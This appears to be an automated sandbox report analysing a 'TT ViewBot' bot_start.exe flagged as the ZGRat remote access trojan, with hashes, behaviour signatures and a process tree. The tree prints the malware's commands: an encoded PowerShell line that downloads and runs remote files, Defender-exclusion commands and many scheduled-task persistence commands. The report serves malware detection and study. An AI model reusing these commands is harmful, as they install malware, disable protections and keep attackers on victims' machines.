Overview
overview
10Static
static
1TT ViewBot...sts.py
windows7-x64
3TT ViewBot...sts.py
windows10-2004-x64
3TT ViewBot...xie.py
windows7-x64
3TT ViewBot...xie.py
windows10-2004-x64
3TT ViewBot...ent.py
windows7-x64
3TT ViewBot...ent.py
windows10-2004-x64
3TT ViewBot...rt.exe
windows7-x64
10TT ViewBot...rt.exe
windows10-2004-x64
10TT ViewBot...tup.py
windows7-x64
3TT ViewBot...tup.py
windows10-2004-x64
7Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-05-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral3
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral5
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral7
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
TT ViewBot v2.0/setup.py
Resource
win7-20240220-en
Behavioral task
behavioral10
Sample
TT ViewBot v2.0/setup.py
Resource
win10v2004-20240419-en
General
-
Target
TT ViewBot v2.0/bot_start.exe
-
Size
2.5MB
-
MD5
bf4a8b1ff2f896acac3e7ace357abfca
-
SHA1
c1bd1b3d2959d844f6b4e339f45d3749667df3e1
-
SHA256
e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e
-
SHA512
fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494
-
SSDEEP
49152:Tfx0DZfVUfCnJA3bxBLbsgyGKEQYdfT3kVYCNN5oUpwmJFkjQuQLLOet:l4ZnIlBvyGKJA3kVD4lIl7r
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral7/files/0x0033000000015f6d-98.dat family_zgrat_v1 behavioral7/files/0x000700000001747d-116.dat family_zgrat_v1 behavioral7/memory/656-117-0x0000000001050000-0x0000000001256000-memory.dmp family_zgrat_v1 behavioral7/memory/336-194-0x0000000000280000-0x0000000000486000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2152 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2080 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 848 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 352 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2168 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 892 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1504 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2816 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1200 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2776 2040 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2592 2040 schtasks.exe 38 -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2948 powershell.exe 7 2948 powershell.exe 9 2948 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2436 powershell.exe 2788 powershell.exe 2360 powershell.exe 2596 powershell.exe 2560 powershell.exe 2948 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2112 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 336 spoolsv.exe -
Loads dropped DLL 3 IoCs
pid Process 2948 powershell.exe 2700 cmd.exe 2700 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\0411\dwm.exe tthyperRuntimedhcpSvc.exe File created C:\Windows\SysWOW64\0411\6cb0b6c459d5d3 tthyperRuntimedhcpSvc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2664 bot_start.exe 2664 bot_start.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\winlogon.exe tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\cc11b995f2a76d tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\f3b6ecef712a24 tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Windows Defender\services.exe tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Windows Defender\c5b4cb5e9653cc tthyperRuntimedhcpSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2080 schtasks.exe 848 schtasks.exe 352 schtasks.exe 1504 schtasks.exe 2776 schtasks.exe 2816 schtasks.exe 2592 schtasks.exe 2144 schtasks.exe 1620 schtasks.exe 2520 schtasks.exe 2152 schtasks.exe 2168 schtasks.exe 892 schtasks.exe 1200 schtasks.exe 2688 schtasks.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\ rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.py rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.py\ = "py_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2468 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2948 powershell.exe 2948 powershell.exe 2948 powershell.exe 2948 powershell.exe 2948 powershell.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe 656 tthyperRuntimedhcpSvc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1892 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 656 tthyperRuntimedhcpSvc.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 336 spoolsv.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2664 bot_start.exe 1892 AcroRd32.exe 1892 AcroRd32.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 2664 wrote to memory of 2948 2664 bot_start.exe 28 PID 2664 wrote to memory of 2948 2664 bot_start.exe 28 PID 2664 wrote to memory of 2948 2664 bot_start.exe 28 PID 2664 wrote to memory of 2948 2664 bot_start.exe 28 PID 2948 wrote to memory of 2112 2948 powershell.exe 30 PID 2948 wrote to memory of 2112 2948 powershell.exe 30 PID 2948 wrote to memory of 2112 2948 powershell.exe 30 PID 2948 wrote to memory of 2112 2948 powershell.exe 30 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2948 wrote to memory of 1968 2948 powershell.exe 31 PID 2112 wrote to memory of 540 2112 tthyperRuntimedhcpSvc.exe 32 PID 2112 wrote to memory of 540 2112 tthyperRuntimedhcpSvc.exe 32 PID 2112 wrote to memory of 540 2112 tthyperRuntimedhcpSvc.exe 32 PID 2112 wrote to memory of 540 2112 tthyperRuntimedhcpSvc.exe 32 PID 1968 wrote to memory of 1892 1968 rundll32.exe 33 PID 1968 wrote to memory of 1892 1968 rundll32.exe 33 PID 1968 wrote to memory of 1892 1968 rundll32.exe 33 PID 1968 wrote to memory of 1892 1968 rundll32.exe 33 PID 540 wrote to memory of 2700 540 WScript.exe 35 PID 540 wrote to memory of 2700 540 WScript.exe 35 PID 540 wrote to memory of 2700 540 WScript.exe 35 PID 540 wrote to memory of 2700 540 WScript.exe 35 PID 2700 wrote to memory of 656 2700 cmd.exe 37 PID 2700 wrote to memory of 656 2700 cmd.exe 37 PID 2700 wrote to memory of 656 2700 cmd.exe 37 PID 2700 wrote to memory of 656 2700 cmd.exe 37 PID 656 wrote to memory of 2596 656 tthyperRuntimedhcpSvc.exe 54 PID 656 wrote to memory of 2596 656 tthyperRuntimedhcpSvc.exe 54 PID 656 wrote to memory of 2596 656 tthyperRuntimedhcpSvc.exe 54 PID 656 wrote to memory of 2560 656 tthyperRuntimedhcpSvc.exe 55 PID 656 wrote to memory of 2560 656 tthyperRuntimedhcpSvc.exe 55 PID 656 wrote to memory of 2560 656 tthyperRuntimedhcpSvc.exe 55 PID 656 wrote to memory of 2436 656 tthyperRuntimedhcpSvc.exe 56 PID 656 wrote to memory of 2436 656 tthyperRuntimedhcpSvc.exe 56 PID 656 wrote to memory of 2436 656 tthyperRuntimedhcpSvc.exe 56 PID 656 wrote to memory of 2788 656 tthyperRuntimedhcpSvc.exe 57 PID 656 wrote to memory of 2788 656 tthyperRuntimedhcpSvc.exe 57 PID 656 wrote to memory of 2788 656 tthyperRuntimedhcpSvc.exe 57 PID 656 wrote to memory of 2360 656 tthyperRuntimedhcpSvc.exe 58 PID 656 wrote to memory of 2360 656 tthyperRuntimedhcpSvc.exe 58 PID 656 wrote to memory of 2360 656 tthyperRuntimedhcpSvc.exe 58 PID 656 wrote to memory of 2364 656 tthyperRuntimedhcpSvc.exe 64 PID 656 wrote to memory of 2364 656 tthyperRuntimedhcpSvc.exe 64 PID 656 wrote to memory of 2364 656 tthyperRuntimedhcpSvc.exe 64 PID 2364 wrote to memory of 1880 2364 cmd.exe 66 PID 2364 wrote to memory of 1880 2364 cmd.exe 66 PID 2364 wrote to memory of 1880 2364 cmd.exe 66 PID 2364 wrote to memory of 2468 2364 cmd.exe 67 PID 2364 wrote to memory of 2468 2364 cmd.exe 67 PID 2364 wrote to memory of 2468 2364 cmd.exe 67 PID 2364 wrote to memory of 336 2364 cmd.exe 68 PID 2364 wrote to memory of 336 2364 cmd.exe 68 PID 2364 wrote to memory of 336 2364 cmd.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"4⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\ChainReview\tthyperRuntimedhcpSvc.exe"C:\ChainReview/tthyperRuntimedhcpSvc.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\lsm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\services.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\winlogon.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\0411\dwm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sFjR0vEqkE.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:1880
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:2468
-
-
C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\main.py3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\main.py"4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1892
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Windows\SysWOW64\0411\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\SysWOW64\0411\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Windows\SysWOW64\0411\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2592
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
91B
MD56c4e82d40f84cbc9a6fec4a5a981a42d
SHA1b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3
SHA25678d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b
SHA512262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842
-
Filesize
2.0MB
MD54518369532566e624ed62d5715fc072c
SHA1c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33
SHA256ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0
SHA512d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0
-
Filesize
212B
MD543e82435c4abdf7a34d3f8ac5c575deb
SHA16d41a829dc856e7d911e8a95e8a4c7463cf18043
SHA2561a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf
SHA512e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
5KB
MD5aa214e7b8696382bdc34b4122f001cfc
SHA18eb821b861487e9a508f405db163a2c5e12cb3f2
